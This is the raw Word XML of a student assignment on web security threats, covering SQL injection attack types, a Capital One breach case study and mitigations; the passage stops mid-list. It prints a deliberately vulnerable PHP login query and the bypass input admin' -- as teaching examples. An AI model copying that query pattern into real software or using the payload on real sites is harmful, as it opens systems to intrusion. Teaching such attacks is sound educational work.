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06B03" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="742C6474" wp14:editId="6616A6E8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2190750</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1409700" cy="1385570"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1387386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5">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="5570" r="9635" b="5573"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1409700" cy="13855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763751" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001745E5" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001745E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>THE CO-OPERATIVE UNIVERSITY OF KENYA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D35078E" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="003943B2" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="466F8011" w14:textId="3D97DA48" w:rsidR="001C7FFD" w:rsidRPr="003943B2" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:ind w:left="2880" w:hanging="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SCHOOL</w:t>
      </w:r>
      <w:r w:rsidRPr="003943B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001745E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SCHOOL OF COMPUTING AND MATHEMATICS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E90EFD5" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="003943B2" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003943B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DEP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="003943B2">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1745E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>COMPUTER SCIENCE AND IT (DCSIT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594D882F" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001745E5" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:ind w:left="2880" w:hanging="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PROGRAMME</w:t>
      </w:r>
      <w:r w:rsidRPr="003943B2">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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>BACHELOR OF SCIENCE IN COMPUTER SCIENCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6E49B2" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="003943B2" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003943B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">UNIT CODE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001745E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>BCIT 2218</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380DE43E" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="003943B2" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003943B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>UNIT TITLE:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001745E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>INTERNET APPLICATION PROGRAMMING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F9E94E" w14:textId="14B6F756" w:rsidR="001C7FFD" w:rsidRPr="001745E5" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003943B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">TASK: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001745E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ASSIGNMENT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19781374" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="003943B2" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003943B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">REG NO.: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bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>C024/402309/2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8F12DF" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001745E5" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003943B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">NAME: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bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ANGELA NJERI GICHANE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D3C4A9" w14:textId="4B537528" w:rsidR="001C7FFD" w:rsidRPr="00D25799" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003943B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">DATE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001745E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>THURSDAY 7</w:t>
      </w:r>
      <w:r w:rsidRPr="001745E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>TH</w:t>
      </w:r>
      <w:r w:rsidRPr="001745E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MARCH</w:t>
      </w:r>
      <w:r w:rsidRPr="001745E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, 2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D6CD2" w14:textId="6BE470AE" w:rsidR="001C7FFD" w:rsidRDefault="001C7FFD">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C3AC7C" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CAF1ABB"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Assignment 2: Research on Web Security Threats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A147BB"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1. Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A49BBEE"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The rapid evolution of web applications has transformed online interactions while introducing sophisticated security threats. Web applications are vulnerable due to their accessibility, complexity, and the valuable data they process. This report examines five major web security threats: SQL Injection, Cross-Site Scripting, Cross-Site Request Forgery, Session Hijacking, and Man-in-the-Middle attacks, analyzing threat mechanisms, case studies, and mitigation strategies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BB81FD"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Modern web applications face security challenges on multiple fronts—from database interactions to client-side scripts and network communications. Understanding these threats is essential for developers, security professionals, and organizations that rely on web applications for critical operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1976894D"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The interconnected nature of today's web ecosystem magnifies these security concerns. With the rise of microservices architectures, API-driven applications, and cloud-based services, the attack surface has expanded dramatically. Each additional component or integration point introduces potential vulnerabilities that attackers can exploit. Furthermore, the increasing sophistication of automated attack tools has lowered the technical barrier for executing complex exploits, making previously advanced attacks accessible to less skilled adversaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737DFFE6"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2. SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CF0BD9"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2.1 Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79064FE2"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 xml:space="preserve">SQL Injection remains one of the most prevalent web security vulnerabilities despite being well-documented for decades. This attack occurs when malicious SQL code is inserted into </w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>input parameters that are later passed to a database for execution. The vulnerability arises when user-supplied data is not properly validated before being incorporated into SQL queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023378F5"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The persistence of SQL injection vulnerabilities in modern applications is often attributed to developer knowledge gaps, legacy codebase maintenance challenges, and the increasing complexity of application ecosystems. Despite being relatively simple to prevent with proper coding practices, approximately 32% of web applications tested in 2024 still contained some form of SQL injection vulnerability, according to industry security reports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB3F931"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2.2 Attack Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126B8A66"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SQL Injection attacks exploit SQL syntax to alter query logic or execute unauthorized commands. Common techniques include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A91B00" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Union-based injections:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Appending UNION commands to extract data from different tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7DA32E" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Error-based injections:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Forcing database errors that reveal database structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEA0B81" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Blind SQL injections</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>: Inferring data based on application behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC82E00" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Time-based injections:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using timing delays to extract information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D99A38B" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Out-of-band injections</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>: Triggering the database to send data to external systems controlled by attackers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A23FAEA"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For example, consider a vulnerable login form:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115DC0BF"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$username = $_POST['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B81BC7"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$password = $_POST['password'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360E8A91"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$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E6BE61"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lastRenderedPageBreak/>
        <w:t>An attacker could input admin' -- as the username, causing the query to become:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D228A0C"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SELECT * FROM users WHERE username='admin' --' AND password='anything'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7116BD08"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The double dash comments out the password verification, bypassing authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105ED179"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Advanced SQL injection techniques can also leverage database-specific features like stored procedures, user-defined functions, and administrative commands to escalate privileges or gain operating system access. For instance, in Microsoft SQL Server, the xp_cmdshell procedure can be exploited to execute shell commands on the underlying server, potentially leading to complete system compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2096C249"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2.3 Real-World Case Study: 2019 Capital One Data Breach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A82E41"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In July 2019, Capital One suffered a massive data breach affecting over 100 million customers. The attacker exploited a misconfigured web application firewall to access sensitive data stored in Amazon S3 buckets. The breach exposed personal information including names, addresses, phone numbers, email addresses, dates of birth, and approximately 140,000 Social Security numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1903553F"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The attack succeeded because of insufficient input validation and improper configuration—conceptually similar to SQL injection issues. The cost to Capital One was enormous: an $80 million regulatory fine, $190 million settlement for class-action lawsuits, and immeasurable reputational damage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEA1F5D"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 xml:space="preserve">Industry analysts noted that the Capital One breach highlighted a critical shift in cloud security paradigms, where traditional perimeter-based security approaches proved inadequate against sophisticated attacks targeting cloud infrastructure misconfigurations. The incident accelerated the adoption of Zero Trust security models across the financial sector, </w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>emphasizing the principle that no traffic, even within internal networks, should be trusted by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C20595"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2.4 Mitigation Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055CF3F5" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>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Prepared Statements and Parameterized Queries:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Separate SQL code from data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A07B4C6" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>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ORM Frameworks:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use tools that abstract direct SQL access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AF07AA" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>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Input Validation:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement strict type checking and pattern matching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C5E8A2" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>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Least Privilege Principle:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use database accounts with minimal necessary permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387A9400" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>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Web Application Firewalls:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Deploy WAFs to detect and block injection attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518C954C" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>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Regular Security Testing:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Conduct automated and manual testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19486186" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>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Database Activity Monitoring:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
